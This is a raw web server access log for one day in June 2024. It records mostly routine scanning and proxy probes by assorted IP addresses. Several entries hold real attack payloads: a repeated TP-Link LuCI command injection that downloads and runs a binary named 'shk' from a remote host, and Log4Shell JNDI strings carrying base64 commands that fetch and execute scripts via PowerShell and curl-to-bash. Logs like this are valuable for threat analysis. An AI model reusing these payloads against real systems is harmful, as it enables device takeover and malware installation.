167.94.146.58 - - [08/Jun/2024:00:25:53 +0200] "GET / HTTP/1.1" 200 1895 167.94.146.58 - - [08/Jun/2024:00:25:56 +0200] "GET / HTTP/1.1" 200 1895 167.94.146.58 - - [08/Jun/2024:00:25:56 +0200] "GET /favicon.ico HTTP/1.1" 404 729 206.168.32.101 - - [08/Jun/2024:00:55:18 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.101 - - [08/Jun/2024:00:55:21 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.101 - - [08/Jun/2024:00:55:22 +0200] "GET /favicon.ico HTTP/1.1" 404 729 87.121.69.27 - - [08/Jun/2024:01:05:44 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 45.141.86.171 - - [08/Jun/2024:02:03:08 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 87.121.69.27 - - [08/Jun/2024:02:43:46 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 64.62.156.12 - - [08/Jun/2024:02:45:37 +0200] "GET / HTTP/1.1" 200 1895 64.62.156.16 - - [08/Jun/2024:02:46:12 +0200] "GET /favicon.ico HTTP/1.1" 404 729 64.62.156.21 - - [08/Jun/2024:02:46:22 +0200] "GET /?format=json HTTP/1.1" 200 1895 64.62.156.23 - - [08/Jun/2024:02:46:34 +0200] "CONNECT www.shadowserver.org:443 HTTP/1.1" 400 804 147.185.132.48 - - [08/Jun/2024:03:09:56 +0200] "-" 400 1930 147.185.132.48 - - [08/Jun/2024:03:09:56 +0200] "-" 400 1930 87.121.69.52 - - [08/Jun/2024:04:50:12 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 87.121.69.27 - - [08/Jun/2024:05:31:44 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 176.97.210.227 - - [08/Jun/2024:05:36:42 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F176.97.210.226%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 188.136.168.233 - - [08/Jun/2024:05:39:05 +0200] "GET / HTTP/1.1" 200 1895 45.141.86.171 - - [08/Jun/2024:05:41:17 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 206.168.32.100 - - [08/Jun/2024:06:26:39 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.100 - - [08/Jun/2024:06:26:43 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.100 - - [08/Jun/2024:06:26:43 +0200] "GET /favicon.ico HTTP/1.1" 404 729 45.227.254.8 - - [08/Jun/2024:07:11:35 +0200] "-" 400 1930 87.121.69.27 - - [08/Jun/2024:07:22:33 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 58.176.223.194 - - [08/Jun/2024:07:47:06 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 400 771 87.121.69.27 - - [08/Jun/2024:07:51:32 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 107.170.250.10 - - [08/Jun/2024:08:33:42 +0200] "-" 400 1930 45.141.86.171 - - [08/Jun/2024:08:55:39 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 188.166.87.67 - - [08/Jun/2024:09:42:50 +0200] "GET / HTTP/1.1" 200 1895 188.166.87.67 - - [08/Jun/2024:09:42:50 +0200] "-" 400 1930 64.62.197.120 - - [08/Jun/2024:10:06:02 +0200] "-" 400 1930 189.141.56.113 - - [08/Jun/2024:10:49:09 +0200] "GET / HTTP/1.1" 200 1895 87.121.69.52 - - [08/Jun/2024:10:57:17 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 194.59.31.99 - - [08/Jun/2024:10:58:44 +0200] "CONNECT api.ipify.org:443 HTTP/1.1" 400 804 160.153.245.83 - - [08/Jun/2024:11:51:34 +0200] "POST /?username=%24%7Bjndi%3Aldap%3A%2F%2F139.59.103.116%3A8066%2FTomcatBypass%2FCommand%2FBase64%2FcG93ZXJzaGVsbCBJRVggKE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJjbGllbnQpLkRvd25sb2FkU3RyaW5nKCdodHRwOi8vMTEwLjE2NS4xNy4xMTE6ODA5MC9kb2NzL2xyLnBzMScp%7D&password=%24%7Bjndi%3Aldap%3A%2F%2F139.59.103.116%3A8066%2FTomcatBypass%2FCommand%2FBase64%2FcG93ZXJzaGVsbCBJRVggKE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJjbGllbnQpLkRvd25sb2FkU3RyaW5nKCdodHRwOi8vMTEwLjE2NS4xNy4xMTE6ODA5MC9kb2NzL2xyLnBzMScp%7D&id=%24%7Bjndi%3Aldap%3A%2F%2F139.59.103.116%3A8066%2FTomcatBypass%2FCommand%2FBase64%2FcG93ZXJzaGVsbCBJRVggKE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJjbGllbnQpLkRvd25sb2FkU3RyaW5nKCdodHRwOi8vMTEwLjE2NS4xNy4xMTE6ODA5MC9kb2NzL2xyLnBzMScp%7D HTTP/1.1" 200 1895 160.153.245.83 - - [08/Jun/2024:11:51:36 +0200] "POST /?password=%24%7Bjndi%3Aldap%3A%2F%2F139.59.103.116%3A8066%2FTomcatBypass%2FCommand%2FBase64%2FY3VybCAtZnNTTCBodHRwOi8vMTEwLjE2NS4xNy4xMTE6ODA5MC9kb2NzL2xyLnNoIHxiYXNo%7D&username=%24%7Bjndi%3Aldap%3A%2F%2F139.59.103.116%3A8066%2FTomcatBypass%2FCommand%2FBase64%2FY3VybCAtZnNTTCBodHRwOi8vMTEwLjE2NS4xNy4xMTE6ODA5MC9kb2NzL2xyLnNoIHxiYXNo%7D&id=%24%7Bjndi%3Aldap%3A%2F%2F139.59.103.116%3A8066%2FTomcatBypass%2FCommand%2FBase64%2FY3VybCAtZnNTTCBodHRwOi8vMTEwLjE2NS4xNy4xMTE6ODA5MC9kb2NzL2xyLnNoIHxiYXNo%7D HTTP/1.1" 200 1895 87.121.69.27 - - [08/Jun/2024:11:53:23 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 45.141.86.171 - - [08/Jun/2024:12:09:10 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 173.230.141.154 - - [08/Jun/2024:12:31:27 +0200] "-" 400 1930 173.230.141.154 - - [08/Jun/2024:12:31:27 +0200] "-" 400 1930 173.230.141.154 - - [08/Jun/2024:12:31:28 +0200] "GET / HTTP/1.1" 200 1895 173.230.141.154 - - [08/Jun/2024:12:31:28 +0200] "GET /download/powershell/ HTTP/1.1" 404 746 173.230.141.154 - - [08/Jun/2024:12:31:28 +0200] "-" 400 1930 71.6.199.23 - - [08/Jun/2024:12:32:08 +0200] "GET / HTTP/1.1" 200 1895 71.6.199.23 - - [08/Jun/2024:12:32:08 +0200] "GET /favicon.ico HTTP/1.1" 404 729 87.121.69.27 - - [08/Jun/2024:12:37:19 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 60.191.20.210 - - [08/Jun/2024:13:00:33 +0200] "GET / HTTP/1.1" 200 1895 194.59.31.99 - - [08/Jun/2024:13:13:40 +0200] "CONNECT api6.ipify.org:443 HTTP/1.1" 400 804 142.93.98.110 - - [08/Jun/2024:13:20:36 +0200] "-" 400 1930 142.93.98.110 - - [08/Jun/2024:13:20:36 +0200] "-" 400 1930 142.93.98.110 - - [08/Jun/2024:13:20:36 +0200] "GET / HTTP/1.1" 200 1895 142.93.98.110 - - [08/Jun/2024:13:20:36 +0200] "GET /download/powershell/ HTTP/1.1" 404 746 142.93.98.110 - - [08/Jun/2024:13:20:36 +0200] "-" 400 1930 176.97.210.227 - - [08/Jun/2024:13:42:38 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F176.97.210.226%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 213.152.176.135 - - [08/Jun/2024:14:37:25 +0200] "GET / HTTP/1.1" 200 1895 213.152.176.135 - - [08/Jun/2024:14:37:25 +0200] "GET /HNAP1/ HTTP/1.1" 404 728 45.141.86.171 - - [08/Jun/2024:15:37:36 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 79.10.146.13 - - [08/Jun/2024:15:42:44 +0200] "GET / HTTP/1.0" 200 1895 87.121.69.27 - - [08/Jun/2024:15:57:21 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 206.168.32.107 - - [08/Jun/2024:16:41:55 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.107 - - [08/Jun/2024:16:41:59 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.107 - - [08/Jun/2024:16:41:59 +0200] "GET /favicon.ico HTTP/1.1" 404 729 152.32.235.90 - - [08/Jun/2024:16:58:08 +0200] "-" 400 1930 152.32.235.90 - - [08/Jun/2024:16:58:19 +0200] "GET / HTTP/1.1" 200 1895 152.32.235.90 - - [08/Jun/2024:16:58:37 +0200] "GET /favicon.ico HTTP/1.1" 404 729 152.32.235.90 - - [08/Jun/2024:16:58:38 +0200] "GET /robots.txt HTTP/1.1" 404 728 78.108.177.54 - - [08/Jun/2024:16:58:38 +0200] "GET / HTTP/1.0" 200 1895 152.32.235.90 - - [08/Jun/2024:16:58:38 +0200] "GET /sitemap.xml HTTP/1.1" 404 729 87.121.69.52 - - [08/Jun/2024:17:02:25 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 176.97.210.227 - - [08/Jun/2024:17:09:31 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F176.97.210.226%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 87.121.69.27 - - [08/Jun/2024:18:07:59 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 103.252.136.86 - - [08/Jun/2024:18:22:27 +0200] "CONNECT www.google.com:443 HTTP/1.1" 400 804 106.75.67.101 - - [08/Jun/2024:18:38:49 +0200] "GET / HTTP/1.1" 200 1895 83.150.237.4 - - [08/Jun/2024:18:39:56 +0200] "GET / HTTP/1.1" 200 1895 45.141.86.171 - - [08/Jun/2024:18:45:38 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 92.249.48.239 - - [08/Jun/2024:18:46:12 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 87.121.69.27 - - [08/Jun/2024:18:48:07 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 104.168.70.165 - - [08/Jun/2024:19:58:25 +0200] "GET / HTTP/1.1" 200 1895 80.76.49.131 - - [08/Jun/2024:20:53:00 +0200] "CONNECT 45.61.137.126:7227 HTTP/1.1" 400 804 147.185.132.91 - - [08/Jun/2024:20:57:35 +0200] "-" 400 1930 147.185.132.91 - - [08/Jun/2024:20:57:35 +0200] "-" 400 1930 206.168.32.101 - - [08/Jun/2024:22:23:26 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.101 - - [08/Jun/2024:22:23:30 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.101 - - [08/Jun/2024:22:23:30 +0200] "GET /favicon.ico HTTP/1.1" 404 729 164.90.170.137 - - [08/Jun/2024:22:28:54 +0200] "-" 400 1930 164.90.170.137 - - [08/Jun/2024:22:29:49 +0200] "GET /hello HTTP/1.1" 404 723 194.59.31.99 - - [08/Jun/2024:22:30:51 +0200] "CONNECT api.ipify.org:443 HTTP/1.1" 400 804 185.191.127.212 - - [08/Jun/2024:22:41:24 +0200] "GET / HTTP/1.1" 200 1895 78.108.177.54 - - [08/Jun/2024:22:51:48 +0200] "GET / HTTP/1.0" 200 1895 87.121.69.52 - - [08/Jun/2024:22:52:14 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 45.141.86.171 - - [08/Jun/2024:23:00:00 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 20.118.69.144 - - [08/Jun/2024:23:11:24 +0200] "GET / HTTP/1.1" 200 1895 139.59.12.16 - - [08/Jun/2024:23:12:05 +0200] "-" 400 1930 139.59.12.16 - - [08/Jun/2024:23:12:06 +0200] "-" 400 1930 139.59.12.16 - - [08/Jun/2024:23:12:06 +0200] "GET / HTTP/1.1" 200 1895 139.59.12.16 - - [08/Jun/2024:23:12:06 +0200] "GET /download/powershell/ HTTP/1.1" 404 746 139.59.12.16 - - [08/Jun/2024:23:12:06 +0200] "-" 400 1930 176.97.210.227 - - [08/Jun/2024:23:22:54 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F176.97.210.226%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 206.168.34.120 - - [08/Jun/2024:23:37:59 +0200] "GET / HTTP/1.1" 200 1895 206.168.34.120 - - [08/Jun/2024:23:38:02 +0200] "GET / HTTP/1.1" 200 1895 206.168.34.120 - - [08/Jun/2024:23:38:03 +0200] "GET /favicon.ico HTTP/1.1" 404 729 87.121.69.27 - - [08/Jun/2024:23:55:56 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804